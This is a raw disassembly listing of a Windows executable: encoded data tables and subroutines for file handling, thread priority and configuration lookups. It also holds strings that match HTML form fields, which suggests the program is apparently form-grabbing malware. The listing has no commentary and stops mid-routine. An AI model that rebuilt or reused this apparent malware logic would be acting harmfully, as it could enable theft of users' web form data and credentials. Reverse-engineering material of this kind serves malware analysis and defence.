dd 729FA5h, 87060000h, 0A3B8A7B0h, 8707009Fh, 0A3B8A7B0h
dd 0A39Fh, 87060000h, 0A3B8A7B6h, 8707009Fh, 0A3B8A7B6h
dd 0A39Fh, 87040000h, 0B3B1AFh, 870D0000h, 0AAA2B0B9h
dd 95A39DABh, 939B939Ah, 870B0000h, 0A1AFAEA6h, 979E99A7h
dd 979Fh, 870C0000h, 0AAA2B0B9h, 95A39DABh, 9CA4A9h, 870A0000h
dd 0A1AFAEA6h, 0A8AD99A7h, 870B00A0h, 9FAEA7B6h, 98979FA9h
dd 0A6A3h, 87050000h, 0B2AFA4AFh, 87060000h, 0A4A3B2B9h
dd 870A00A3h, 0A3B3A7B6h, 97AAA1B0h, 87090096h, 0B2B5AAB7h
dd 0A4AFA9A0h, 87070000h, 0ADA2A7B6h, 0AEABh, 87090000h
dd 0A3ACA788h, 797C9FB0h, 870D0000h, 0A3ACA788h, 98879FB0h
dd 0A293979Eh, 87070000h, 80B4AB86h, 0AEA8h, 870D0000h
dd 0A3ACA797h, 9887AE9Fh, 0A293979Eh, 87170000h, 9FA5B487h
dd 0A57B9FB0h, 0A291A2A1h, 8B948C95h, 8B948B66h, 8A7Dh
dd 870E0000h, 82B4A78Bh, 99A1B0A1h, 9E917599h, 8713009Fh
dd 9FA5B487h, 0A57B9FB0h, 0A291A2A1h, 8B948C95h, 6568h
dd 870A0000h, 9FA5B487h, 797C9FB0h, 87160075h, 9FA5B487h
dd 0AA8B9FB0h, 9B9197A6h, 6D70987Bh, 7F829190h, 87160088h
dd 0AEA9A68Bh, 9BAE9B8Fh, 95919F7Dh, 79977E91h, 7F859498h
dd 87150089h, 0AEA9A68Bh, 7FAC9F83h, 939793A1h, 958B9871h
dd 91928788h, 87190000h, 0AEA9A68Bh, 7FAC9F83h, 939793A1h
dd 958B9871h, 91928788h, 7B92836Fh, 87110000h, 0AEA9A68Bh
dd 0A6ABA380h, 7795A5A3h, 8B8F8B99h, 871C0000h, 0AEA9A68Bh
dd 979DAC7Fh, 977297A8h, 968997A0h, 8B8F946Ah, 6A615C64h
dd 605361h, 87100000h, 0AEA9A68Bh, 89ABAFA8h, 92A4A79Ch
dd 96A19Bh, 870F0000h, 0AEA9A68Bh, 89ABAFA8h, 0A2A293A8h
dd 9AA1h, 87080000h, 8E938B88h, 917B88h, 870A0000h, 71A9A6ABh
dd 0A29C686Eh, 870A00A0h, 71A5AEB3h, 0A29C686Eh, 870C00A0h
dd 0AEA9A6ABh, 64ABAFA8h, 9C9E98h, 87080000h, 9FA6A7A8h
dd 0ACA6B1h, 87080000h, 0B1AEABBBh, 689BB0h, 9D190000h
dd 0A3B2A5B7h, 92ABA8A1h, 538CA559h, 85805E5Ch, 76585249h
dd 7D88844Ah, 9D0B0000h, 0A5A1AFADh, 0A6A269A1h, 9999h
dd 870E0000h, 6CB5676Eh, 5B66AF61h, 0A35560A9h, 9D140056h
dd 0A693A797h, 0A59CAEB1h, 0A080A0ABh, 9291A095h, 858989h
dd 9D110000h, 0A384A797h, 869FAF9Eh, 97A69BA6h, 8B8F8F98h
dd 870D0000h, 83B4A797h, 0A8A7ACAEh, 9394A181h, 9D0D0000h
dd 0AAA3AEBEh, 0AAA69FA5h, 93A89762h, 9D0C0000h, 0AEB4B7B3h
dd 64ACADABh, 95AA99h, 9D0A0000h, 0AAA4B6B2h, 0A29C68A8h
dd 870500A0h, 0AAACA38Ch, 9D080000h, 639FB569h, 90726Ch
dd 9D0F0000h, 96787269h, 8E706A61h, 86686259h, 8251h, 9D0A0000h
dd 0B1B2B5A7h, 0AE9D68AFh, 87070099h, 0B2B3BBB7h, 0A7A1h
dd 87090000h, 0B2A6B1B7h, 9BAA9BB3h, 9D090000h, 0B0A5B5B9h
dd 0AAA1A8A5h, 9D2E0000h, 0B2A6B1B7h, 9BAA9BB3h, 91999F90h
dd 959B999Eh, 957C968Ah, 857C8885h, 716C858Bh, 6B7A7C81h
dd 63767672h, 65616D6Eh, 63624E62h, 9D36005Ah, 0B2A6B1B7h
dd 9BAA9BB3h, 91999F90h, 959B999Eh, 957C968Ah, 857C8885h
dd 7C30858Bh, 7B6B6680h, 6C657476h, 685D7070h, 5C5F5B67h
dd 54516148h, 4D475150h, 9D04004Ah, 848B99h, 9D350000h
dd 0B2A6B1B7h, 9BAA9BB3h, 91999F90h, 959B999Eh, 957C968Ah
dd 857C8885h, 7C30858Bh, 7B6B6680h, 6C657476h, 685D7070h
dd 5C5F5B67h, 5A4D5848h, 4952515Bh, 9D330000h, 0B2A6B1B7h
dd 9BAA9BB3h, 91999F90h, 959B999Eh, 957C968Ah, 857C8885h
dd 716C858Bh, 6B7A7C81h, 63767672h, 65616D6Eh, 66554E62h
dd 5857565Ch, 5449h, 87330000h, 0A7BAB191h, 6599A6A8h
dd 4E606068h, 93978D54h, 87948394h, 517D867Eh, 57635F34h
dd 343E2A51h, 55203D34h, 655C6865h, 3C10656Bh, 141D0A40h
dd 0B15h, 9D150000h, 9793A1A3h, 837D8E8Fh, 5F699193h, 5F605D6Fh
dd 7D7F5754h, 9D150000h, 9793A1A3h, 837D8E8Fh, 62669193h
dd 5C586E6Dh, 7D7F5756h, 9D150000h, 9793A1A3h, 837D8E8Fh
dd 74679193h, 595A5F60h, 7D7F5769h, 9D150000h, 9793A1A3h
dd 837D8E8Fh, 63649193h, 5C6E5C6Dh, 7D7F5354h, 9D150000h
dd 9793A1A3h, 837D8E8Fh, 61629193h, 6C586270h, 7D7F5255h
dd 9D070000h, 92939B97h, 8781h, 9D050000h, 9FACA572h, 9D0D0000h
dd 0AAB0BAA9h, 0A89DACABh, 93A89762h, 9D0C0000h, 0A6A3B8B7h
dd 64ACADABh, 95AA99h, 9D0D0000h, 0AAAEABBBh, 0A4A7A1ABh
dd 93A89762h, 9D090000h, 0B1AFB6B2h, 9BB09F6Ah, 9D0A0000h
dd 0A3A4ABBAh, 0A29C68ABh, 9D0A00A0h, 0A7A4B7A5h, 0A29C68ABh
dd 9D0800A0h, 0AEAEB5BBh, 0A59FABh, 0
dd 22280000h, 0FD340040h, 22140040h, 0FD380040h, 22040040h
dd 0FD3C0040h, 21F40040h, 0FD400040h, 21E00040h, 0FD440040h
dd 21D00040h, 0FD480040h, 21BC0040h, 0FD4C0040h, 21B00040h
dd 0FD500040h, 21980040h, 0FD540040h, 21880040h, 0FD580040h
dd 216C0040h, 0FD5C0040h, 215C0040h, 0FD600040h, 21480040h
dd 0FD640040h, 21400040h, 0FD680040h, 21340040h, 0FD6C0040h
dd 21200040h, 0FD700040h, 210C0040h, 0FD740040h, 20FC0040h
dd 0FD780040h, 20EC0040h, 0FD7C0040h, 20E00040h, 0FD800040h
dd 20D00040h, 0FD840040h, 20C40040h, 0FD880040h, 20B80040h
dd 0FD8C0040h, 20AC0040h, 0FD900040h, 20A00040h, 0FD940040h
dd 20940040h, 0FD980040h, 20880040h, 0FD9C0040h, 207C0040h
dd 0FDA00040h, 20700040h, 0FDA40040h, 20640040h, 0FDA80040h
dd 20540040h, 0FDAC0040h, 20440040h, 0FDB00040h, 20300040h
dd 0FDB40040h, 20180040h, 0FDB80040h, 200C0040h, 0FDBC0040h
dd 1FFC0040h, 0FDC00040h, 1FEC0040h, 0FDC40040h, 1FDC0040h
dd 0FDC80040h, 1FD00040h, 0FDCC0040h, 1FC00040h, 0FDD00040h
dd 1FB40040h, 0FDD40040h, 1FA00040h, 0FDD80040h, 1F900040h
dd 0FDDC0040h, 1F740040h, 0FDE00040h, 1F600040h, 0FDE40040h
dd 1F500040h, 0FDE80040h, 1F3C0040h, 0FDEC0040h, 1F300040h
dd 0FDF00040h, 1F240040h, 0FDF40040h, 1F140040h, 0FDF80040h
dd 1F040040h, 0FDFC0040h, 1EF00040h, 0FE000040h, 1EE00040h
dd 0FE040040h, 1EC80040h, 0FE080040h, 1EB40040h, 0FE0C0040h
dd 1EA40040h, 0FE100040h, 1E880040h, 0FE140040h, 1E740040h
dd 0FE180040h, 1E640040h, 0FE1C0040h, 1E540040h, 0FE200040h
dd 1E440040h, 0FE240040h, 1E340040h, 0FE280040h, 1E240040h
dd 0FE2C0040h, 1E100040h, 0FE300040h, 1E000040h, 0FE340040h
dd 1DF00040h, 0FE380040h, 1DE00040h, 0FE3C0040h, 1DCC0040h
dd 0FE400040h, 1DB40040h, 0FE440040h, 1DA00040h, 0FE480040h
dd 1D8C0040h, 0FE4C0040h, 1D780040h, 0FE500040h, 1D640040h
dd 0FE540040h, 1D540040h, 0FE580040h, 1D400040h, 0FE5C0040h
dd 1D280040h, 0FE600040h, 1D100040h, 0FE640040h, 1D000040h
dd 0FE680040h, 1CEC0040h, 0FE6C0040h, 1CDC0040h, 0FE700040h
dd 1CCC0040h, 0FE740040h, 1CBC0040h, 0FE780040h, 1CA80040h
dd 0FE7C0040h, 1C8C0040h, 0FE800040h, 1C740040h, 0FE840040h
dd 1C5C0040h, 0FE880040h, 1C4C0040h, 0FE8C0040h, 1C380040h
dd 0FE900040h, 1C280040h, 0FE940040h, 1C180040h, 0FE980040h
dd 1C0C0040h, 0FE9C0040h, 1BF80040h, 0FEA00040h, 1BE80040h
dd 0FEA40040h, 1BD80040h, 0FEA80040h, 1BCC0040h, 0FEAC0040h
dd 1BBC0040h, 0FEB00040h, 1BA00040h, 0FEB40040h, 1B840040h
dd 0FBA80040h, 1B740040h, 0FC280040h, 12580040h, 0FC2C0040h
dd 1B580040h, 0FC300040h, 121C0040h, 0FC340040h, 124C0040h
dd 0FC380040h, 1B440040h, 0FC3C0040h, 12340040h, 0FC400040h
dd 1B380040h, 0FC700040h, 1B2C0040h, 0FC740040h, 1B200040h
dd 0FC780040h, 1B100040h, 0FC7C0040h, 1B000040h, 0FC800040h
dd 1AF40040h, 0FC840040h, 1AE80040h, 0FC880040h, 1AD80040h
dd 0FC8C0040h, 1AC40040h, 0FC900040h, 1AB00040h, 0FC940040h
dd 1A980040h, 0FC980040h, 1A880040h, 0FC9C0040h, 1A780040h
dd 0FCA00040h, 1A600040h, 0FCAC0040h, 1A500040h, 0FB3C0040h
dd 11540040h, 0FB400040h, 1A3C0040h, 0FB440040h, 1A280040h
dd 0FB480040h, 1A140040h, 0FB4C0040h, 11F40040h, 0FB500040h
dd 11B80040h, 0FB540040h, 1A000040h, 0FB580040h, 19E40040h
dd 0FB5C0040h, 11440040h, 0FB600040h, 19CC0040h, 0FB640040h
dd 12080040h, 0FB680040h, 11E00040h, 0FB6C0040h, 11CC0040h
dd 0FB700040h, 19B40040h, 0FB740040h, 199C0040h, 0FB780040h
dd 116C0040h, 0FB7C0040h, 11A00040h, 0FB800040h, 11880040h
dd 0FB840040h, 19800040h, 0FB880040h, 196C0040h, 0FB8C0040h
dd 11340040h, 0FB900040h, 19500040h, 0FB940040h, 19380040h
dd 0FB980040h, 19240040h, 0FB9C0040h, 190C0040h, 0FBA00040h
dd 18FC0040h, 0FBC40040h, 18E40040h, 0FBC80040h, 18CC0040h
dd 0FBCC0040h, 18B80040h, 0FBD00040h, 18A00040h, 0FBD40040h
dd 188C0040h, 0FBD80040h, 18780040h, 0FBDC0040h, 18640040h
dd 0FBE00040h, 18540040h, 0FBE40040h, 18440040h, 0FBE80040h
dd 18300040h, 0FBEC0040h, 18200040h, 0FBF00040h, 18000040h
dd 0FBF40040h, 17E40040h, 0FBF80040h, 17CC0040h, 0FBFC0040h
dd 17B80040h, 0FC000040h, 17A00040h, 0FC040040h, 178C0040h
dd 0FC080040h, 177C0040h, 0FC0C0040h, 17680040h, 0FC100040h
dd 17540040h, 0FC140040h, 173C0040h, 0FC180040h, 112C0040h
dd 0FCBC0040h, 11140040h, 0FCC00040h, 11080040h, 0FCC40040h
dd 10FC0040h, 0FCC80040h, 11240040h, 0FCCC0040h, 172C0040h
dd 0FCD00040h, 17240040h, 0FCD40040h, 171C0040h, 0FCD80040h
dd 17140040h, 0FCDC0040h, 170C0040h, 0FCE00040h, 17000040h
dd 0FCE40040h, 16F40040h, 0FCE80040h, 16EC0040h, 0FCEC0040h
dd 16E00040h, 0FCF00040h, 16D80040h, 0FCF40040h, 16CC0040h
dd 0FCF80040h, 16C00040h, 0FCFC0040h, 16B00040h, 0FD000040h
dd 112C0040h, 0FBB40040h, 11240040h, 0FBB80040h, 11140040h
dd 0FBBC0040h, 16A00040h, 0FACC0040h, 16900040h, 0FAD00040h
dd 10BC0040h, 0FAD40040h, 10DC0040h, 0FAD80040h, 10EC0040h
dd 0FADC0040h, 10CC0040h, 0FAE00040h, 16800040h, 0FAE40040h
dd 10A80040h, 0FAE80040h, 16740040h, 0FAEC0040h, 16600040h
dd 0FAF00040h, 16440040h, 0FAF40040h, 16300040h, 0FAF80040h
dd 16140040h, 0FAFC0040h, 15FC0040h, 0FB000040h, 15E80040h
dd 0FB040040h, 15D40040h, 0FB080040h, 15B80040h, 0FB0C0040h
dd 15A80040h, 0FB100040h, 15980040h, 0FB140040h, 15840040h
dd 0FB180040h, 15740040h, 0FB1C0040h, 15640040h, 0FB200040h
dd 15580040h, 0FB240040h, 15480040h, 0FB280040h, 15340040h
dd 0FC680040h, 151C0040h, 0FC480040h, 150C0040h, 0FC4C0040h
dd 14EC0040h, 0FC500040h, 14CC0040h, 0FC540040h, 14A80040h
dd 0FC580040h, 14940040h, 0FC5C0040h, 10940040h, 0FC600040h
dd 14900040h, 148C0040h, 14880040h, 14840040h, 2020040h
dd 0A0A0202h, 147C200Ah, 626E0040h, 3B7073h, 5C0000h, 2E005Ch
dd 70005Ch, 700069h, 5C0065h, 0
db 0
align 2
dw 2Ch
db 0
align 2
aZspjudv_0 db 9,'µ°§spjž¤¢',0
align 2
dw 0A70Ch
aIBoemjdsu db '¨¸¡®¥mjd˜žœ',0
db 0
align 2
aGZjudv db 9,'¶·£°§jž¤¢',0
align 2
aMoQmgfAu db 0Bh,'¹¬®·Ÿ¬£fš ž',0
align 4
db 0
align 2
aMzmkolfAu db 0Bh,'¹¬§¬ªolfš ž',0
align 4
db 0
align 2
dw 0B10Ch
aIOgimjdsu db '©´®£¨mjd˜žœ',0
db 0
align 2
aP db '&p=',0
a4 db '4=',0
align 2
a1 db '1=',0
align 2
aInputValue_0 db '*<input *value="',0
align 4
db 0
align 2
aOptionSelect_0 db '*<option selected',0
align 2
aSelect_0 db '*<select ',0
dd 25250000h, 75752530h, 670000h, 610072h, 5F0062h, 530025h
dd 25005Fh, 320030h, 5F0075h, 300025h, 750032h, 25005Fh
dd 320030h, 2E0075h, 690062h, 6Eh
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414785 proc near ; CODE XREF: sub_4148E2+15�p
var_E8 = byte ptr -0E8h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1A = word ptr -1Ah
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push edi
push [ebp+arg_0]
xor ebx, ebx
push ebx
mov [ebp+var_1], bl
call dword_40FC48
mov edi, eax
cmp edi, ebx
jz loc_4148DB
push 4
push [ebp+arg_4]
lea eax, [ebp+var_C]
push eax
push edi
mov [ebp+var_8], ebx
mov [ebp+var_C], ebx
call dword_40FC5C
test eax, eax
jz loc_4148D3
test [ebp+arg_8], 1
push esi
mov [ebp+var_10], ebx
mov esi, offset dword_401000
jnz short loc_4147F5
lea eax, [ebp+var_10]
push eax
push esi
call sub_41B99C
cmp eax, 4
pop ecx
pop ecx
jnz short loc_4147F5
mov eax, [ebp+var_10]
mov eax, [eax]
cmp eax, [ebp+var_C]
jnz short loc_4147F5
mov [ebp+var_1], 1
loc_4147F5: ; CODE XREF: sub_414785+4F�j
; sub_414785+60�j ...
push [ebp+var_10]
call sub_41A83D
cmp [ebp+var_C], 200h
pop ecx
jnb short loc_414810
mov [ebp+var_1], 1
jmp loc_4148D2
; ---------------------------------------------------------------------------
loc_414810: ; CODE XREF: sub_414785+80�j
cmp [ebp+var_1], bl
jnz loc_4148D2
push [ebp+var_C]
call sub_41A81F
cmp eax, ebx
pop ecx
mov [ebp+var_8], eax
jz loc_4148D2
push 4
push [ebp+arg_4]
lea eax, [ebp+var_C]
push eax
push edi
call dword_40FC5C
test eax, eax
jz loc_4148C9
lea eax, [ebp+var_20]
push eax
call dword_40FE8C ; GetSystemTime
movzx eax, [ebp+var_20]
push eax
movzx eax, [ebp+var_1E]
push eax
movzx eax, [ebp+var_1A]
push eax
push [ebp+arg_0]
mov eax, dword_40FB34
push dword ptr [eax+1B0h]
lea eax, [ebp+var_E8]
push 63h
push eax
call dword_40FC84
push [ebp+var_C]
lea eax, [ebp+var_E8]
push [ebp+var_8]
push eax
call sub_41CD76
add esp, 28h
test al, al
jz short loc_4148C9
push 4
lea eax, [ebp+var_C]
push eax
push esi
call sub_41B9E9
add esp, 0Ch
mov [ebp+var_1], al
push ebx
jmp short loc_4148BC
; ---------------------------------------------------------------------------
loc_4148A9: ; CODE XREF: sub_414785+142�j
push esi
call dword_40FC58
cmp eax, ebx
jz short loc_4148BB
push eax
call dword_40FC54
loc_4148BB: ; CODE XREF: sub_414785+12D�j
push esi
loc_4148BC: ; CODE XREF: sub_414785+122�j
push edi
call dword_40FC50
mov esi, eax
cmp esi, ebx
jnz short loc_4148A9
loc_4148C9: ; CODE XREF: sub_414785+BA�j
; sub_414785+10D�j
push [ebp+var_8]
call sub_41A83D
pop ecx
loc_4148D2: ; CODE XREF: sub_414785+86�j
; sub_414785+8E�j ...
pop esi
loc_4148D3: ; CODE XREF: sub_414785+3C�j
push ebx
push edi
call dword_40FC4C
loc_4148DB: ; CODE XREF: sub_414785+1E�j
mov al, [ebp+var_1]
pop edi
pop ebx
leave
retn
sub_414785 endp
; =============== S U B R O U T I N E =======================================
sub_4148E2 proc near ; CODE XREF: .data:00416B2E�p
arg_0 = dword ptr 4
push [esp+arg_0]
mov eax, dword_40FB34
push dword ptr [eax+1A8h]
push dword ptr [eax+1ACh]
call sub_414785
add esp, 0Ch
retn
sub_4148E2 endp
; ---------------------------------------------------------------------------
aUnlFb db 'Ul$”ìØ',0
db 2 dup(0), 53h
dd 56785D8Bh, 5774758Bh, 537C75FFh, 6015FF56h, 8B0040FCh
dd 0FFF85F8h, 9184h, 0FF68500h, 8984h, 3E8300h, 80840Fh
dd 7E830000h, 7A740004h, 505C458Dh, 0FE8C15FFh, 0B70F0040h
dd 0F505C45h, 505E45B7h, 6245B70Fh, 0FB34A150h, 20680040h
dd 0FF004010h, 1B0B0h, 94458D00h, 0FF50636Ah, 40FC8415h
dd 8D36FF00h, 76FF9445h, 0F3E85004h, 83000083h, 0C08428C4h
dd 0DB852E74h, 14682C74h, 8D004010h, 0FF509445h, 40FDA415h
dd 15FF5300h, 40FD90h, 8D50C003h, 50539445h, 83C5E8h, 0CC48300h
dd 275C084h, 0C78BFF33h, 835B5E5Fh, 0C2C96CC5h
db 0Ch, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4149C6 proc near ; CODE XREF: sub_41504B�p
; .data:004157EB�p
var_208 = byte ptr -208h
push ebp
mov ebp, esp
sub esp, 208h
push esi
mov esi, offset dword_40F5D0
push esi
call sub_41B1E0
mov eax, dword_40FB34
pop ecx
push dword ptr [eax+8]
push dword ptr [eax]
lea eax, [ebp+var_208]
push eax
call dword_40FC8C
lea eax, [ebp+var_208]
push eax
push esi
push esi
call dword_40FC8C
and dword_40F5CC, 0
mov eax, esi
pop esi
leave
retn
sub_4149C6 endp
; =============== S U B R O U T I N E =======================================
sub_414A0E proc near ; CODE XREF: sub_414C49+3B�p
; sub_414C49+118�p ...
arg_0 = dword ptr 4
mov eax, dword_40FB34
push esi
push edi
push dword ptr [eax+28h]
call sub_41B06E
mov edi, eax
xor esi, esi
cmp edi, esi
pop ecx
jnz short loc_414A2D
loc_414A26: ; CODE XREF: sub_414A0E+80�j
xor al, al
jmp loc_414AD0
; ---------------------------------------------------------------------------
loc_414A2D: ; CODE XREF: sub_414A0E+16�j
mov eax, dword_40FB34
push esi
push esi
push esi
push esi
push 6
push dword ptr [eax+30h]
call sub_41AAD0
mov eax, [esp+20h+arg_0]
add esp, 18h
cmp eax, esi
jnz short loc_414A50
mov eax, offset dword_40F5D0
loc_414A50: ; CODE XREF: sub_414A0E+3B�j
push esi
push esi
push 3
push esi
push esi
push 80000000h
push eax
call dword_40FDC0 ; CreateFileW
cmp eax, 0FFFFFFFFh
mov dword_40F5CC, eax
push esi
jnz short loc_414A90
mov dword_40F5CC, esi
loc_414A73: ; CODE XREF: sub_414A0E+9B�j
mov eax, dword_40FB34
push esi
push esi
push esi
push 5
push dword ptr [eax+30h]
call sub_41AAD0
push edi
call sub_41B0A5
add esp, 1Ch
jmp short loc_414A26
; ---------------------------------------------------------------------------
loc_414A90: ; CODE XREF: sub_414A0E+5D�j
push eax
call dword_40FDFC ; GetFileSize
cmp eax, 6
jnb short loc_414AAB
push dword_40F5CC
call dword_40FDAC ; CloseHandle
push esi
jmp short loc_414A73
; ---------------------------------------------------------------------------
loc_414AAB: ; CODE XREF: sub_414A0E+8C�j
call dword_40FE50 ; GetCurrentThread
mov esi, eax
push esi
call dword_40FE4C ; GetThreadPriority
push 2
push esi
mov dword_40F7F0, eax
call dword_40FE48 ; SetThreadPriority
mov dword_40F7F4, edi
mov al, 1
loc_414AD0: ; CODE XREF: sub_414A0E+1A�j
pop edi
pop esi
retn
sub_414A0E endp
; =============== S U B R O U T I N E =======================================
sub_414AD3 proc near ; CODE XREF: sub_414C49+57�p
; sub_414C49+171�p ...
push dword_40F5CC
call dword_40FDAC ; CloseHandle
xor eax, eax
push eax
push eax
push eax
push eax
mov dword_40F5CC, eax
mov eax, dword_40FB34
push 5
push dword ptr [eax+30h]
call sub_41AAD0
push dword_40F7F4
call sub_41B0A5
add esp, 1Ch
push dword_40F7F0
call dword_40FE50 ; GetCurrentThread
push eax
call dword_40FE48 ; SetThreadPriority
retn
sub_414AD3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414B1B proc near ; CODE XREF: sub_414C49+49�p
; sub_414C49+133�p ...
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = word ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, dword_40F5CC
sub esp, 14h
push ebx
push edi
xor edi, edi
cmp eax, edi
jnz short loc_414B35
xor eax, eax
jmp loc_414C45
; ---------------------------------------------------------------------------
loc_414B35: ; CODE XREF: sub_414B1B+11�j
push esi
push edi
push edi
push edi
mov [ebp+var_4], edi
push eax
jmp short loc_414B65
; ---------------------------------------------------------------------------
loc_414B3F: ; CODE XREF: sub_414B1B+69�j
cmp [ebp+var_4], 5
jnz loc_414C42
movzx esi, [ebp+var_12]
cmp esi, edi
jz short loc_414B5B
mov ax, [ebp+var_14]
cmp ax, [ebp+arg_0]
jz short loc_414B8B
loc_414B5B: ; CODE XREF: sub_414B1B+34�j
push 1
push edi
push esi
push dword_40F5CC
loc_414B65: ; CODE XREF: sub_414B1B+22�j
call dword_40FDC8 ; SetFilePointer
push edi
lea eax, [ebp+var_4]
push eax
push 5
lea eax, [ebp+var_14]
push eax
push dword_40F5CC
call dword_40FDF4 ; ReadFile
test eax, eax
jnz short loc_414B3F
jmp loc_414C42
; ---------------------------------------------------------------------------
loc_414B8B: ; CODE XREF: sub_414B1B+3E�j
push esi
call sub_41A81F
mov ebx, eax
cmp ebx, edi
pop ecx
jz loc_414C42
push edi
lea eax, [ebp+var_4]
push eax
push esi
push ebx
push dword_40F5CC
call dword_40FDF4 ; ReadFile
test eax, eax
jz loc_414C3B
cmp [ebp+var_4], esi
jnz short loc_414C3B
cmp [ebp+arg_4], edi
jnz short loc_414BCA
push ebx
loc_414BC2: ; CODE XREF: sub_414B1B+10E�j
call sub_41A83D
pop ecx
jmp short loc_414C37
; ---------------------------------------------------------------------------
loc_414BCA: ; CODE XREF: sub_414B1B+A4�j
test [ebp+var_10], 1
mov [ebp+var_8], edi
mov [ebp+var_C], edi
jz short loc_414BE6
lea eax, [ebp+var_8]
push eax
push esi
push ebx
call sub_41AF95
add esp, 0Ch
mov esi, eax
loc_414BE6: ; CODE XREF: sub_414B1B+B9�j
cmp esi, edi
jz short loc_414C37
test [ebp+var_10], 2
jz short loc_414C09
mov eax, [ebp+var_8]
cmp eax, edi
jnz short loc_414BF9
mov eax, ebx
loc_414BF9: ; CODE XREF: sub_414B1B+DA�j
lea ecx, [ebp+var_C]
push ecx
push esi
push eax
call sub_41AFF9
add esp, 0Ch
mov esi, eax
loc_414C09: ; CODE XREF: sub_414B1B+D3�j
cmp esi, edi
jz short loc_414C37
test [ebp+var_10], 3
jz short loc_414C32
push ebx
call sub_41A83D
mov eax, [ebp+var_C]
cmp eax, edi
pop ecx
mov ecx, [ebp+arg_4]
jz short loc_414C2B
push [ebp+var_8]
mov [ecx], eax
jmp short loc_414BC2
; ---------------------------------------------------------------------------
loc_414C2B: ; CODE XREF: sub_414B1B+107�j
mov eax, [ebp+var_8]
mov [ecx], eax
jmp short loc_414C37
; ---------------------------------------------------------------------------
loc_414C32: ; CODE XREF: sub_414B1B+F6�j
mov eax, [ebp+arg_4]
mov [eax], ebx
loc_414C37: ; CODE XREF: sub_414B1B+AD�j
; sub_414B1B+CD�j ...
mov eax, esi
jmp short loc_414C44
; ---------------------------------------------------------------------------
loc_414C3B: ; CODE XREF: sub_414B1B+96�j
; sub_414B1B+9F�j
push ebx
call sub_41A83D
pop ecx
loc_414C42: ; CODE XREF: sub_414B1B+28�j
; sub_414B1B+6B�j ...
xor eax, eax
loc_414C44: ; CODE XREF: sub_414B1B+11E�j
pop esi
loc_414C45: ; CODE XREF: sub_414B1B+15�j
pop edi
pop ebx
leave
retn
sub_414B1B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414C49 proc near ; CODE XREF: .data:00414F1B�p
; .data:00414FC8�p
var_210 = byte ptr -210h
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push ebx
call sub_41B390
push dword_40FAB8
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4171F1
add esp, 0Ch
push [ebp+arg_0]
mov [ebp+var_1], al
call dword_40FB40
xor ebx, ebx
cmp [ebp+var_1], bl
jz short loc_414CB3
push 1
push [ebp+arg_4]
call sub_414A0E
test al, al
pop ecx
pop ecx
jz short loc_414CB3
push ebx
push 1
call sub_414B1B
pop ecx
cmp eax, 4
pop ecx
setz [ebp+var_1]
call sub_414AD3
cmp [ebp+var_1], bl
jnz short loc_414CB9
push [ebp+arg_4]
call sub_41B052
pop ecx
loc_414CB3: ; CODE XREF: sub_414C49+34�j
; sub_414C49+44�j ...
or eax, 0FFFFFFFFh
loc_414CB6: ; CODE XREF: sub_414C49+87�j
; sub_414C49+22E�j
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_414CB9: ; CODE XREF: sub_414C49+5F�j
mov eax, dword_40FB34
push dword ptr [eax+28h]
call sub_41B06E
cmp eax, ebx
pop ecx
mov [ebp+var_8], eax
jnz short loc_414CD2
loc_414CCE: ; CODE XREF: sub_414C49+110�j
xor eax, eax
jmp short loc_414CB6
; ---------------------------------------------------------------------------
loc_414CD2: ; CODE XREF: sub_414C49+83�j
push esi
push edi
call dword_40FE50 ; GetCurrentThread
mov esi, eax
push esi
call dword_40FE4C ; GetThreadPriority
push 2
push esi
mov edi, eax
call dword_40FE48 ; SetThreadPriority
mov eax, dword_40FB34
push ebx
push ebx
push ebx
push ebx
push 6
push dword ptr [eax+30h]
call sub_41AAD0
push [ebp+arg_8]
call sub_41B052
add esp, 1Ch
push 3
push [ebp+arg_8]
push [ebp+arg_4]
call dword_40FE68 ; MoveFileExW
test eax, eax
setnz [ebp+var_1]
cmp [ebp+var_1], bl
jnz short loc_414D2E
push [ebp+arg_4]
call sub_41B052
pop ecx
loc_414D2E: ; CODE XREF: sub_414C49+DA�j
mov eax, dword_40FB34
push ebx
push ebx
push ebx
push ebx
push 5
push dword ptr [eax+30h]
call sub_41AAD0
push [ebp+var_8]
call sub_41B0A5
add esp, 1Ch
push edi
push esi
call dword_40FE48 ; SetThreadPriority
cmp [ebp+var_1], bl
pop edi
pop esi
jz loc_414CCE
push ebx
push ebx
call sub_414A0E
test al, al
pop ecx
pop ecx
jz loc_414CB3
lea eax, [ebp+var_8]
push eax
push 1
mov [ebp+var_1], bl
mov [ebp+var_8], ebx
call sub_414B1B
cmp eax, 4
pop ecx
pop ecx
jb loc_414E0F
mov eax, [ebp+var_8]
mov ecx, [eax]
mov edx, dword_40FC1C
cmp ecx, [edx+40h]
ja short loc_414DA2
test [ebp+arg_C], 1
jz short loc_414E0F
loc_414DA2: ; CODE XREF: sub_414C49+151�j
push eax
call sub_41A83D
lea eax, [ebp+var_8]
push eax
push 2
call sub_414B1B
add esp, 0Ch
test eax, eax
jz short loc_414E0F
call sub_414AD3
lea eax, [ebp+var_210]
push eax
mov [ebp+var_1], 1
call sub_41B2FA
push dword_40FAB8
lea eax, [ebp+var_210]
push [ebp+var_8]
push eax
push dword_40FABC
call sub_4172E5
add esp, 14h
test al, al
jz short loc_414E02
push ebx
lea eax, [ebp+var_210]
push eax
push ebx
call sub_41C56C
add esp, 0Ch
loc_414E02: ; CODE XREF: sub_414C49+1A6�j
lea eax, [ebp+var_210]
push eax
call sub_41B052
pop ecx
